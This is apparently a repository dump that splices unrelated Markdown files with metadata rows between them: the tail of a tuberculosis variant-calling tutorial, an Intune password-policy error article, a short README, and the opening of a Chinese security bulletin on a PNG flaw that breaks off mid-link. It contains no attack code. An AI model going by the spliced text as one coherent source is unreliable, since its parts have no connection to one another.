assocation, compared the reads with our reference sequence and then called variants (SNPs and indels) between our sample and the reference genome. We have tried to mitigate a few errors along the way: 1. Sequencing errors: these were addressed by the quality trimming step 2. Sample contamination: we used `kraken2` to assess the extent of this problem in our sample 3. Appropriate choice of a reference genome: we used a genome that is inferred to be ancestral to all *M. tuberculosis* for our analysis and the diversity within Mtb is limited enough for us to rely on a single reference genome for the entire species. 4. Quality filtering in the mapping and variant calling stage: Internally `snippy` uses tools like `bwa-mem` and `freebayes` that judge the quality of their predictions. `snippy` then uses this information to perform some filtering on variant calling predictions. # Further variant filtering and TB-profiling We still cannot entirely trust the proposed variants. In particular, there are regions of the *M. tuberculosis* genome that are difficult to effectively map reads to. These include the PE/PPE/PGRS genes, which are highly repetitive, and the IS (insertion sequence sites). Secondly, when an insertion or deletion (indel) occurs in our sample relative to the reference it can cause apparent, but false, single nucleotide variants to appear near the indel. Finally where few reads map to a region of the reference genome, either because of a sequence deletion or because of a high GC content in the genomic region, we cannot be confident about the quality of variant calling in the region. The `TB Variant Filter` can help filter out variants based on a variety of criteria, including those listed above. > ### {% icon hands_on %} Hands-on: Run Snippy > 1. {% tool [TB Variant Filter](toolshed.g2.bx.psu.edu/repos/iuc/tb_variant_filter/tb_variant_filter/0.1.3+galaxy0) %}: {% icon tool %} with the following parameters > - *"VCF file to be filter"*: `snippy on data XX, data XX, and data XX mapped reads vcf file` > - *"Filters to apply"*: Select `Filter variants by region`, `Filter variants close to indels` and `Filter sites by read alignment depth`. > > 2. Open the new VCF file. > > > ### {% icon question %} Questions > > > > 1. How many of the original variants have now been filtered out? > > > > > ### {% icon solution %} Solution > > > > > > 1. `218` (The difference in the number of lines between the snippy vcf file and the filtered vcf file.) > > > > > {: .solution} > {: .question} {: .hands_on} Now that we have a collection of *high quality variants* we can search them against variants known to be associated with drug resistance. The *TB Profiler* tool does this using a database of variants curated by Dr Jody Phelan at the London School of Hygiene and Tropical Medicine. It can do its own mapping and variant calling but also accepts mapped reads in BAM format as input. It does its own variant calling and filtering. Finally, TB Variant Report use the COMBAT-TB [eXplorer](https://explorer.sanbi.ac.za) [database](https://academic.oup.com/bioinformatics/advance-article/doi/10.1093/bioinformatics/btz658/5554700) of *M. tuberculosis* genome annotation to annotate variants in Mtb. It also takes the output of *TB Profiler* and produces a neat report that is easy to browse and search. > ### {% icon hands_on %} Hands-on: Run TB Profiler > 1. {% tool [TB-Profiler profile](toolshed.g2.bx.psu.edu/repos/iuc/tbprofiler/tb_profiler_profile/2.8.4+galaxy1) %}: {% icon tool %} with the following parameters > - *"Input File Type"*: `BAM` > - *"Bam"*: `snippy on data XX, data XX, and data X mapped reads (bam)` > > > **TB Profiler** produces 3 output files, it's own VCF file, a report about the sample including it's likely lineages and any AMR found. There is also a `.json` formatted results file. > > 2. When *snippy* is run with Genbank format input it prepends `GENE_` to gene names in the VCF annotation. This causes a problem for *TB Variant report*, so we need to edit the output with sed. > > {% tool [Text transformation with sed](toolshed.g2.bx.psu.edu/repos/bgruening/text_processing/tp_sed_tool/1.1.1) %}: {% icon tool %} with the following parameters: > > - *"SED Program"*: `s/GENE_//g` > > 3. {% tool [TB Variant Report](toolshed.g2.bx.psu.edu/repos/iuc/tbvcfreport/tbvcfreport/0.1.7+galaxy0) %}: {% icon tool %} with the following parameters > - *"Input SnpEff annotated M.tuberculosis VCF(s)"*: `TB-Profiler Profile VCF on data XX` > - *"TBProfiler Drug Resistance Report (Optional)"*: `TB-Profiler Profile on data XX: Results.json` > > 3. Open the drug resistance and variant report html files. > > > ### {% icon question %} Questions > > > > 1. What was the final lineage of the sample we tested? > > > > 2. Were there any drug resistances found? > > > > > ### {% icon solution %} Solution > > > > > > 1. `4` > > > > > > 2. Yes, resistance to isoniazid, rifampicin, ethambutol, pyrazinamide and streptomycin is predicted from mutations in the katG, rpoB, embB, pncA and rpsL genes respectively. > > > > > {: .solution} > {: .question} {: .hands_on} # View Snippy output in JBrowse We could go through all of the variants in the VCF files and read them out of a text table, but this is onerous and doesn't really give the context of the changes very well. It would be much nicer to have a visualisation of the SNPs and the other relevant data. In Galaxy we can use a tool called JBrowse. > ### {% icon hands_on %} Hands-on: Run JBrowse > > 1. {% tool [JBrowse](toolshed.g2.bx.psu.edu/repos/iuc/jbrowse/jbrowse/1.16.8+galaxy1) %} {% icon tool %} with the following parameters > - *"Reference genome to display"*: `Use a genome from history` > - *"Select the reference genome"*: `https://zenodo.org/record/3497110/files/MTB_ancestor_reference.fasta` > > This sequence will be the reference against which annotations are displayed > > - *"Produce Standalone Instance"*: `Yes` > - *"Genetic Code"*: `11: The Bacterial, Archaeal and Plant Plastid Code` > - *"JBrowse-in-Galaxy Action"*: `New JBrowse Instance` > - *"Track Group"* > > We will now set up three different tracks - these are datasets displayed underneath the reference sequence (which is displayed as nucleotides in FASTA format). We will choose to display the sequence reads (the .bam file), the variants found by snippy (the .gff file) and the annotated reference genome (the wildtype.gff) > > - **Track 1 - sequence reads**: Click on `Insert Track Group` and fill it with > - "Track Category" to `sequence reads` > - Click on `Insert Annotation Track` and fill it with > - "Track Type" to `BAM Pileups` > - "BAM Track Data" to `snippy on data XX, data XX, and data XX mapped reads (bam)` > - "Autogenerate SNP Track" to `Yes` > - "Track Visibility" to `On for new users` > - **Track 2 - variants**: Click on `Insert Track Group` and fill it with > - "Track Category" to `variants` > - Click on `Insert Annotation Track` and fill it with > - "Track Type" to `VCF SNPs` > - "SNP Track Data" to `TB Variant Filter on data XX` > - "Track Visibility" to `On for new users` > - **Track 3 - annotated reference**: Click on `Insert Track Group` and fill it with > - "Track Category" to `annotated reference` > - Click on `Insert Annotation Track` and fill it with > - "Track Type" to `GFF/GFF3/BED Features` > - "GFF/GFF3/BED Track Data" to `https://zenodo.org/record/3531703/files/Mycobacterium_tuberculosis_h37rv.ASM19595v2.45.chromosome.Chromosome.gff3` > - "JBrowse Track Type [Advanced]" to `Canvas Features` > - Click on "JBrowse Styling Options [Advanced]" > - "JBrowse style.label" to `product` > - "JBrowse style.description" to `product` > - "Track Visibility" to `On for new users` {: .hands_on} A new dataset will be created in your history, containing the JBrowse interactive visualisation. We will now view its contents and play with it by clicking the {% icon galaxy-eye %} (eye) icon of the `JBrowse on data XX and data XX - Complete` dataset. The JBrowse window will appear in the centre Galaxy panel. You can now click on the names of the tracks to add them in, try the vcf file and gff file. You can see where the variants are located and which genes they are in. If you click on the BAM file you can zoom right in to see the read alignments for each variant if you wish. # Different samples, different stories (optional) In [Zenodo](https://doi.org/10.5281/zenodo.3960260) we have included sample *18-1* from the same study (aka. [ERR1750907](https://www.ebi.ac.uk/ena/browser/view/ERR1750907)). This is also a southern African *M. tuberculosis* sample, but in some ways quite different from the sample we have analysed in the tutorial thus far. > ### {% icon hands_on %} Hands-on: Take a closer look at sample 18-1 > > 1. Fetch the data from Zenodo >``` >https://zenodo.org/record/3960260/files/018-1_1.fastq.gz >https://zenodo.org/record/3960260/files/018-1_2.fastq.gz >``` > > 2. Examine the sequence quality with {% tool [FastQC](toolshed.g2.bx.psu.edu/repos/devteam/fastqc/fastqc/0.72+galaxy1) %} {% icon tool %}. > > 3. Examine the sample composition with {% tool [Kraken2](toolshed.g2.bx.psu.edu/repos/iuc/kraken2/kraken2/2.0.8_beta+galaxy0) %} {% icon tool %}. > > > ### {% icon question %} Questions > > > > 1. What problems were discovered with sequence quality? > > > > 2. What did the kraken2 report show? How does this impact your assessment of variants discovered from this sample? > > > > > ### {% icon solution %} Solution > > > > > > 1. The quality of the sequence drops sharply towards the end of the sequences. Even more concerning, the sequence content changes across the length of the sample, which is not what we would expect at all. Finally, the sample seems to contain sequencing adapters, an artefact of the sequencing process that should be trimmed out before any sequence analysis. > > > > > > 2. Only 55% of the sequence reads are associated with the genus *Mycobacterium*. Perhaps the quality problems in the sequence reads contribute to this poor classification? They certainly will make variant calling less reliable. > > > > > {: .solution} > {: .question} {: .hands_on} As you can see, quality of sequence data strongly determines how useful it is for subsequent analysis. This is why quality control is always a first step before trying to call and interpret variants. What we do with a sample like this will depend on what resources we have available. Can we discard it and use other data for our analysis? Can we re-sequence? Can we clean it up, remove the adapters (using **Trimmomatic**, **fastp** or **cutadapt**) and perhaps use the Kraken2 output to decide which reads to keep? These are all possible strategies and there is no one answer for which is the correct one to pursue. The next example is *SRR12416842* from an Indonesia [study](https://www.microbiologyresearch.org/content/journal/jmm/10.1099/jmm.0.001221) of multi-drug resistant (MDR) tuberculosis. > ### {% icon hands_on %} Hands-on: Take a closer look at sample SRR12416842 > > 1. Fetch the data from EBI European Nucleotide Archive >``` >ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR124/042/SRR12416842/SRR12416842_1.fastq.gz >ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR124/042/SRR12416842/SRR12416842_2.fastq.gz >``` > > 2. Examine the sequence quality with {% tool [FastQC](toolshed.g2.bx.psu.edu/repos/devteam/fastqc/fastqc/0.72+galaxy1) %} {% icon tool %}. > > 3. Perform quality trimming with {% tool [Trimmomatic](toolshed.g2.bx.psu.edu/repos/pjbriggs/trimmomatic/trimmomatic/0.36.5) %} {% icon tool %} > > 4. Map the samples to the *M. tuberculosis* reference genome with {% tool [Snippy](toolshed.g2.bx.psu.edu/repos/iuc/snippy/snippy/4.5.0) %} {% icon tool %} > > > ### {% icon question %} Questions > > > > 1. Was the sequence quality good? > > > > 2. How many variants were discovered by snippy? > > > > > ### {% icon solution %} Solution > > > > > > 1. The **FastQC** result shows that while there is some dropoff in sequence quality (especially towards the end of the reads from the second dataset), the sequences are of good enough quality to analyse. > > > > > > 2. **snippy* discovered more than 15,000 variants. This is unusual for a *M. tuberculosis* sample where we expect at most a few thousand variants across the length of the genome. > > {: .solution} > {: .question} > > 5. Run {% tool [samtools stats](toolshed.g2.bx.psu.edu/repos/devteam/samtools_stats/samtools_stats/2.0.2+galaxy2) %} {% icon tool %} on the *snippy on data XX, data XX, and data XX mapped reads (bam)* file. In the output, pay attention to the *sequences*, *reads mapped* and *reads unmapped* results. > > 6. Run the {% tool [BAM Coverage Plotter](toolshed.g2.bx.psu.edu/repos/iuc/jvarkit_wgscoverageplotter/jvarkit_wgscoverageplotter/20201223+galaxy0)} %} {% icon tool %} on the mapped reads BAM file that you got from **snippy**. > > > ### {% icon question %} Questions > > > > 1. What percentage of reads mapped to the reference genome? > > > > 2. If you could run the **BAM Coverage Plotter** tool, was the coverage even across the genome? > > > > > ### {% icon solution %} Solution > > > > > > 1. Only 107351 out of 7297618, that is 1.5%, of the reads mapped to the reference genome. > > > > > > 2. The image from the **BAM Coverage Plotter** tool shows just a few vertical bars, suggestion that almost no reads mapped to the reference genome. > > > > > > ![BAM Coverage Plot of SRR12416842 showing few reads mapped](../../images/mtb_poor_mapping.png) > > > > > > By contrast, reads from the `004-02` map evenly across the *M. tuberculosis* genome, with an average depth of over 100 reads, as shown in this output from **BAM Coverage Plotter**: > > > > > > ![BAM Coverage Plot of 004-02 showing reads mapped evenly](../../images/mtb_good_mapping.png) > > > > > > If you wish to investigate further, analyse the SRR12416842 sample with **kraken2**. > > {: .solution} > {: .question} {: .hands_on} There is something clearly wrong with sample SRR12416842, perhaps indicating sample contamination. This example of a sample that doesn't map to the reference genome illustrates that even when sequence quality is good, sequence data problems can become apparent in later steps of analysis and it is important to always have a sense of what results to expect. You can develop a better sense of what quality control results to expect by first practicing techniques with known data before analysing new samples. We hope you enjoyed this tutorial!
67.149554
801
0.712495
eng_Latn
0.99063
6f538580336e05ac4927c29c96f00d8264d84ef3
1,847
md
Markdown
support/mem/intune/error-deploying-password-policy.md
dafiore0713/SupportArticles-docs
e1277124d3675af3bd1f7aa6c9e2620476b579f2
[ "CC-BY-4.0", "MIT" ]
36
2021-02-05T18:05:23.000Z
2022-03-28T19:54:39.000Z
support/mem/intune/error-deploying-password-policy.md
dafiore0713/SupportArticles-docs
e1277124d3675af3bd1f7aa6c9e2620476b579f2
[ "CC-BY-4.0", "MIT" ]
456
2021-01-30T15:17:42.000Z
2022-03-31T22:36:01.000Z
support/mem/intune/error-deploying-password-policy.md
dafiore0713/SupportArticles-docs
e1277124d3675af3bd1f7aa6c9e2620476b579f2
[ "CC-BY-4.0", "MIT" ]
412
2021-02-03T13:07:36.000Z
2022-03-31T23:58:49.000Z
--- title: Error -2016281112 deploying password policy description: Describes error -2016281112 when you deploy a password policy in Microsoft Intune. ms.date: 05/11/2020 ms.prod-support-area-path: Device protection --- # Error -2016281112 when you deploy password policy in Microsoft Intune This article fixes an issue in which you receive error -2016281112 when you deploy a password policy in Microsoft Intune. _Original product version:_ &nbsp; Microsoft Intune _Original KB number:_ &nbsp; 4095085 ## Symptom When you deploy a device restriction policy for password in Microsoft Intune, you receive error -2016281112. Here is an example case in which you specify the **Required password type** setting: ![Screenshot of the error code -2016281112.](./media/error-deploying-password-policy/error-code.png) ## Cause For Android and Windows desktop devices, password policies can't be immediately enforced on the users by using device restriction policies. If the user doesn't change the password as required by the policy, the error remains. ## Resolution To fix the issue, direct the users to change their password. > [!NOTE] > > - On the Android platform, the end user must accept the password change notification. > - On the Windows MDM desktop platform, the user must press CTRL+ALT+DEL and click **Change Password**, and then the new password rules will be enforced. ## More information For Android and Windows desktop devices, we recommend that you deploy a device-compliance policy to enforce the same password setting. This enforces the password change at device enrollment or blocks noncompliant devices from company resources. You can also notify the users by email and give them a grace period to be compliant. See [Configure actions for noncompliant devices in Intune](/mem/intune/protect/actions-for-noncompliance).
46.175
244
0.791554
eng_Latn
0.992123
6f53d1cd173ddb04da564e63382c5b02601000ce
55
md
Markdown
README.md
rlong/browser.app.McRemote
4e99d394d2940b925a0c2165a4f8808075edb5f9
[ "MIT" ]
null
null
null
README.md
rlong/browser.app.McRemote
4e99d394d2940b925a0c2165a4f8808075edb5f9
[ "MIT" ]
null
null
null
README.md
rlong/browser.app.McRemote
4e99d394d2940b925a0c2165a4f8808075edb5f9
[ "MIT" ]
null
null
null
# browser.app.vlc-control Ionic PWA app to control VLC
18.333333
28
0.781818
eng_Latn
0.452756
6f53ef76d1abe53de3964f3c311983b9ed6acce6
3,145
markdown
Markdown
_posts/2019-03-1-mysql-enum.markdown
dukedukeduke/dukedukeduke.github.io
82ff6806e7f7737c67ae0333d992584ad2db8227
[ "MIT" ]
1
2019-04-09T08:29:00.000Z
2019-04-09T08:29:00.000Z
_posts/2019-03-1-mysql-enum.markdown
dukedukeduke/dukedukeduke.github.io
82ff6806e7f7737c67ae0333d992584ad2db8227
[ "MIT" ]
null
null
null
_posts/2019-03-1-mysql-enum.markdown
dukedukeduke/dukedukeduke.github.io
82ff6806e7f7737c67ae0333d992584ad2db8227
[ "MIT" ]
7
2019-02-18T09:20:09.000Z
2019-03-12T02:58:25.000Z
--- layout: post title: "mysql enum 类型" date: 2019-03-1 18:27:02 +0800 comments: true tags: - mysql - enunm --- ### 参考 https://dev.mysql.com/doc/refman/5.7/en/enum.html https://segmentfault.com/q/1010000003709270 ### 介绍 MySQL 支持enum类型,实际存储得是tinyint。可读性和效率兼具。 举个例子: 首先看mysql这边的设置 ``` CREATE TABLE t_order ( order_id int, products varchar(64), status ENUM('canceled', 'finished', 'delivering') ); insert into t_order(order_id, products, status) values (1, "笔记本电脑", "canceled"), (2, "华为手机", "finished"), (3, "小米手环", "delivering"); mysql> select * from t_order; +----------+-----------------+------------+ | order_id | products | status | +----------+-----------------+------------+ | 1 | 笔记本电脑 | canceled | | 2 | 华为手机 | finished | | 3 | 小米手环 | delivering | +----------+-----------------+------------+ 3 rows in set (0.00 sec) ``` 程序端只要按字符串访问就可以 ### More An ENUM is a string object with a value chosen from a list of permitted values that are enumerated explicitly in the column specification at table creation time. It has these advantages: Compact data storage in situations where a column has a limited set of possible values. The strings you specify as input values are automatically encoded as numbers. See Section 11.8, “Data Type Storage Requirements” for the storage requirements for ENUM types. Readable queries and output. The numbers are translated back to the corresponding strings in query results. Creating and Using ENUM Columns An ENUM column can have a maximum of 65,535 distinct elements. An enumeration value must be a quoted string literal. For example, you can create a table with an ENUM column like this: ``` CREATE TABLE shirts ( name VARCHAR(40), size ENUM('x-small', 'small', 'medium', 'large', 'x-large') ); INSERT INTO shirts (name, size) VALUES ('dress shirt','large'), ('t-shirt','medium'), ('polo shirt','small'); SELECT name, size FROM shirts WHERE size = 'medium'; +---------+--------+ | name | size | +---------+--------+ | t-shirt | medium| +---------+--------+ UPDATE shirts SET size = 'small' WHERE size = 'large'; COMMIT; ``` Inserting 1 million rows into this table with a value of 'medium' would require 1 million bytes of storage, as opposed to 6 million bytes if you stored the actual string 'medium' in a VARCHAR column. Each enumeration value has an index: - The elements listed in the column specification are assigned index numbers, beginning with 1. - The index value of the empty string error value is 0. This means that you can use the following SELECT statement to find rows into which invalid ENUM values were assigned: ``` mysql> SELECT * FROM tbl_name WHERE enum_col=0; ``` - The index of the NULL value is NULL. - The term “index” here refers to a position within the list of enumeration values. It has nothing to do with table indexes. For example, a column specified as ENUM('Mercury', 'Venus', 'Earth') can have any of the values shown here. The index of each value is also shown |--- |Value | index| |NULL | NULL| |'' | 0| |'Mercury' | 1| |'Venus' | 2| |'Earth' | 3|
33.105263
261
0.660095
eng_Latn
0.979554
6f55120d433c0c0238e3d4fe45886c686641ceab
1,113
md
Markdown
docs/data/oledb/cdbpropidset-setguid.md
svick/cpp-docs
76fd30ff3e0352e2206460503b61f45897e60e4f
[ "CC-BY-4.0", "MIT" ]
1
2021-04-18T12:54:41.000Z
2021-04-18T12:54:41.000Z
docs/data/oledb/cdbpropidset-setguid.md
Mikejo5000/cpp-docs
4b2c3b0c720aef42bce7e1e5566723b0fec5ec7f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/data/oledb/cdbpropidset-setguid.md
Mikejo5000/cpp-docs
4b2c3b0c720aef42bce7e1e5566723b0fec5ec7f
[ "CC-BY-4.0", "MIT" ]
1
2020-07-11T13:20:45.000Z
2020-07-11T13:20:45.000Z
--- title: "CDBPropIDSet::SetGUID | Microsoft Docs" ms.custom: "" ms.date: "11/04/2016" ms.technology: ["cpp-data"] ms.topic: "reference" f1_keywords: ["CDBPropIDSet.SetGUID", "ATL::CDBPropIDSet::SetGUID", "SetGUID", "ATL.CDBPropIDSet.SetGUID", "CDBPropIDSet::SetGUID"] dev_langs: ["C++"] helpviewer_keywords: ["SetGUID method"] ms.assetid: 8dd0f3bf-1490-4d53-9063-322b8d821bbe author: "mikeblome" ms.author: "mblome" ms.workload: ["cplusplus", "data-storage"] --- # CDBPropIDSet::SetGUID Sets the GUID field in the **DBPROPIDSET** structure. ## Syntax ```cpp void SetGUID(const GUID& guid) throw(); ``` #### Parameters `guid` [in] A GUID used to set the **guidPropertySet** field of the [DBPROPIDSET](https://msdn.microsoft.com/en-us/library/ms717981.aspx) structure. ## Remarks This field can be set by the [constructor](../../data/oledb/cdbpropidset-cdbpropidset.md) as well. Call this function if you use the default constructor for this class. ## Requirements **Header:** atldbcli.h ## See Also [CDBPropIDSet Class](../../data/oledb/cdbpropidset-class.md)
31.8
171
0.694519
kor_Hang
0.279088
6f5515eea08b4ced0ccc1f4e68fcbbf897747297
4,071
md
Markdown
curriculum/challenges/english/03-front-end-libraries/react/create-a-component-with-composition.english.md
InaSLew/freeCodeCamp
222948d5aca27f03d8a91bfa21d6c49cc82c663d
[ "BSD-3-Clause" ]
5
2020-07-09T10:19:39.000Z
2021-12-06T00:43:23.000Z
curriculum/challenges/english/03-front-end-libraries/react/create-a-component-with-composition.english.md
InaSLew/freeCodeCamp
222948d5aca27f03d8a91bfa21d6c49cc82c663d
[ "BSD-3-Clause" ]
58
2019-04-25T23:23:57.000Z
2021-07-28T23:18:44.000Z
curriculum/challenges/english/03-front-end-libraries/react/create-a-component-with-composition.english.md
InaSLew/freeCodeCamp
222948d5aca27f03d8a91bfa21d6c49cc82c663d
[ "BSD-3-Clause" ]
2
2019-05-29T14:58:56.000Z
2019-07-18T03:52:00.000Z
--- id: 5a24c314108439a4d4036164 title: Create a Component with Composition challengeType: 6 isRequired: false --- ## Description <section id='description'> Now we will look at how we can compose multiple React components together. Imagine you are building an App and have created three components, a <code>Navbar</code>, <code>Dashboard</code>, and <code>Footer</code>. To compose these components together, you could create an <code>App</code> <i>parent</i> component which renders each of these three components as <i>children</i>. To render a component as a child in a React component, you include the component name written as a custom HTML tag in the JSX. For example, in the <code>render</code> method you could write: <blockquote>return (<br> &lt;App&gt;<br>&nbsp;&nbsp;&lt;Navbar /&gt;<br>&nbsp;&nbsp;&lt;Dashboard /&gt;<br>&nbsp;&nbsp;&lt;Footer /&gt;<br> &lt;/App&gt;<br>)</blockquote> When React encounters a custom HTML tag that references another component (a component name wrapped in <code>&lt; /&gt;</code> like in this example), it renders the markup for that component in the location of the tag. This should illustrate the parent/child relationship between the <code>App</code> component and the <code>Navbar</code>, <code>Dashboard</code>, and <code>Footer</code>. </section> ## Instructions <section id='instructions'> In the code editor, there is a simple functional component called <code>ChildComponent</code> and a class component called <code>ParentComponent</code>. Compose the two together by rendering the <code>ChildComponent</code> within the <code>ParentComponent</code>. Make sure to close the <code>ChildComponent</code> tag with a forward slash. <strong>Note:</strong>&nbsp;<code>ChildComponent</code> is defined with an ES6 arrow function because this is a very common practice when using React. However, know that this is just a function. If you aren't familiar with the arrow function syntax, please refer to the JavaScript section. </section> ## Tests <section id='tests'> ```yml tests: - text: The React component should return a single <code>div</code> element. testString: assert((function() { var shallowRender = Enzyme.shallow(React.createElement(ParentComponent)); return shallowRender.type() === 'div'; })(), 'The React component should return a single <code>div</code> element.'); - text: The component should return two nested elements. testString: assert((function() { var shallowRender = Enzyme.shallow(React.createElement(ParentComponent)); return shallowRender.children().length === 2; })(), 'The component should return two nested elements.'); - text: The component should return the ChildComponent as its second child. testString: assert((function() { const mockedComponent = Enzyme.mount(React.createElement(ParentComponent)); return mockedComponent.find('ParentComponent').find('ChildComponent').length === 1; })(), 'The component should return the ChildComponent as its second child.'); ``` </section> ## Challenge Seed <section id='challengeSeed'> <div id='jsx-seed'> ```jsx const ChildComponent = () => { return ( <div> <p>I am the child</p> </div> ); }; class ParentComponent extends React.Component { constructor(props) { super(props); } render() { return ( <div> <h1>I am the parent</h1> { /* change code below this line */ } { /* change code above this line */ } </div> ); } }; ``` </div> ### After Test <div id='jsx-teardown'> ```js ReactDOM.render(<ParentComponent />, document.getElementById('root')) ``` </div> </section> ## Solution <section id='solution'> ```js const ChildComponent = () => { return ( <div> <p>I am the child</p> </div> ); }; class ParentComponent extends React.Component { constructor(props) { super(props); } render() { return ( <div> <h1>I am the parent</h1> { /* change code below this line */ } <ChildComponent /> { /* change code above this line */ } </div> ); } }; ``` </section>
35.4
388
0.694915
eng_Latn
0.963432
6f55439bc91cc73fa7d879de058f2d56dd478b9e
2,291
md
Markdown
desktop-src/medfound/mfpkey-wmaaecma-featr-micarr-beamproperty.md
npherson/win32
28da414b56bb3e56e128bf7e0db021bad5343d2d
[ "CC-BY-4.0", "MIT" ]
3
2020-04-24T13:02:42.000Z
2021-07-17T15:32:03.000Z
desktop-src/medfound/mfpkey-wmaaecma-featr-micarr-beamproperty.md
npherson/win32
28da414b56bb3e56e128bf7e0db021bad5343d2d
[ "CC-BY-4.0", "MIT" ]
null
null
null
desktop-src/medfound/mfpkey-wmaaecma-featr-micarr-beamproperty.md
npherson/win32
28da414b56bb3e56e128bf7e0db021bad5343d2d
[ "CC-BY-4.0", "MIT" ]
1
2022-03-09T23:50:05.000Z
2022-03-09T23:50:05.000Z
--- Description: Specifies which beam the Voice Capture DSP uses for microphone array processing. ms.assetid: 9ed761da-3f1b-47e8-b71f-becc56fe8801 title: MFPKEY_WMAAECMA_FEATR_MICARR_BEAM Property ms.topic: article ms.date: 05/31/2018 --- # MFPKEY\_WMAAECMA\_FEATR\_MICARR\_BEAM Property Specifies which beam the Voice Capture DSP uses for microphone array processing. ## Constant for IPropertyBag Available only by using [**IPropertyStore**](https://msdn.microsoft.com/en-us/library/Bb761474(v=VS.85).aspx). ## Data Type VT\_I4 ## Applies To - [Voice Capture DSP](voicecapturedmo.md) ## Remarks Set this property if the value of the [MFPKEY\_WMAAECMA\_FEATR\_MICARR\_MODE](mfpkey-wmaaecma-featr-micarr-modeproperty.md) property is MICARRAY\_EXTERN\_BEAM. If the value of [**MFPKEY\_WMAAECMA\_FEATR\_MICARR\_MODE**](mfpkey-wmaaecma-featr-micarr-modeproperty.md) is MICARRAY\_SINGLE\_BEAM, you can read this property to query which beam was selected by the DSP. This property can have the following values. Values are in degrees horizontal. | Value | Description | |-------|--------------------------| | 0 | -50 degrees. | | 1 | -40 degrees. | | 2 | -30 degrees. | | 3 | -20 degrees. | | 4 | -10 degrees. | | 5 | 0 degrees (center beam). | | 6 | 10 degrees. | | 7 | 20 degrees. | | 8 | 30 degrees. | | 9 | 40 degrees. | | 10 | 50 degrees. |   ## Requirements | | | |-------------------------------------|-----------------------------------------------------------------------------------------| | Minimum supported client<br/> | Windows Vista \[desktop apps only\]<br/> | | Minimum supported server<br/> | Windows Server 2008 \[desktop apps only\]<br/> | | Header<br/> | <dl> <dt>Wmcodecdsp.h</dt> </dl> | ## See also <dl> <dt> [Media Foundation Properties](media-foundation-properties.md) </dt> <dt> [Voice Capture DSP](voicecapturedmo.md) </dt> </dl>    
27.939024
204
0.532082
eng_Latn
0.664281
6f558098c8239ac41d5f8492e6ae6acab9422569
35,855
md
Markdown
security-updates/SecurityBulletins/2005/ms05-009.md
MicrosoftDocs/security-updates.zh-tw
a7899f202a462bc504303f28e9c2a8d41cfa99a0
[ "CC-BY-4.0", "MIT" ]
3
2019-01-24T02:18:29.000Z
2020-05-19T20:17:25.000Z
security-updates/SecurityBulletins/2005/ms05-009.md
MicrosoftDocs/security-updates.zh-tw
a7899f202a462bc504303f28e9c2a8d41cfa99a0
[ "CC-BY-4.0", "MIT" ]
257
2017-12-11T09:12:37.000Z
2019-12-06T23:07:01.000Z
security-updates/SecurityBulletins/2005/ms05-009.md
MicrosoftDocs/security-updates.zh-tw
a7899f202a462bc504303f28e9c2a8d41cfa99a0
[ "CC-BY-4.0", "MIT" ]
5
2018-10-12T21:08:18.000Z
2021-11-15T11:25:34.000Z
--- TOCTitle: 'MS05-009' Title: 'Microsoft Security Bulletin MS05-009 - 重大' ms:assetid: 'ms05-009' ms:contentKeyID: 61237388 ms:date: '04/18/2014' ms:mtpsurl: 'https://technet.microsoft.com/zh-TW/library/ms05-009(v=Security.10)' --- Microsoft Security Bulletin MS05-009 - 重大 =========================================== PNG 處理弱點可能會允許遠端執行程式碼 (890261) --------------------------------------------- 發行: 2005年2月8日 | 更新: 2005年7月6日 **發佈日期**:2005 年 2 月 9 日 **版本:**1.0 #### 摘要 **應該閱讀此文件的對象:**使用 Microsoft Windows Media Player、Windows Messenger 和 MSN Messenger 的客戶 **此弱點的影響:**遠端執行程式碼 **最高的嚴重性等級:**重大 **建議:**客戶應立即套用此更新程式 **安全性更新取代資訊:**本公告取代了一個先前發行的安全性更新。 請參閱本公告的<常見問題集>(FAQ) 以取得完整清單。 **警告:無** **已測試軟體及安全性更新下載位置:** **受影響的軟體:** - Microsoft Windows Media Player 9 系列 (在 Windows 2000、Windows XP 及 Windows Server 2003 上使用時) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=a52279dc-3b6c-4720-8192-45657edbb14f) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=a52279dc-3b6c-4720-8192-45657edbb14f) - Microsoft Windows Messenger 5.0 版 (獨立版本,可安裝於所有支援的作業系統) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=a8d9eb73-5f8c-4b9a-940f-9157a3b3d774) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=a8d9eb73-5f8c-4b9a-940f-9157a3b3d774) - Microsoft MSN Messenger 6.1 – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) - Microsoft MSN Messenger 6.2 – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) - Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) – 請參閱此公告<常見問題集>中有關這些作業系統的詳細資訊。 **不受影響的軟體:** - Windows Media Player 6.4 - Windows Media Player 7.1 - Windows Media Player for Windows XP (8.0) - Windows XP Service Pack 2 中的 Windows Media Player 9 Series - Windows Media Player 10 **已測試的 Microsoft Windows 元件:** **受影響的元件:** - Microsoft Windows Messenger 4.7.0.2009 版 (在 Windows XP Service Pack 1 上使用時) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=e3dc209b-ad57-49e1-bb90-6fa2ca8763a6) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=e3dc209b-ad57-49e1-bb90-6fa2ca8763a6&displaylang=en) - Microsoft Windows Messenger 4.7.0.3000 版 (在 Windows XP Service Pack 2 上使用時) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=1dcc9628-e2d0-496f-b4f2-3afefa0a0156) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=1dcc9628-e2d0-496f-b4f2-3afefa0a0156&displaylang=en) 本清單所列出之軟體版本已經過測試以判斷是否受到影響。 其他版本已不再提供安全性更新支援,或是並不會受到影響。 請造訪 [Microsoft 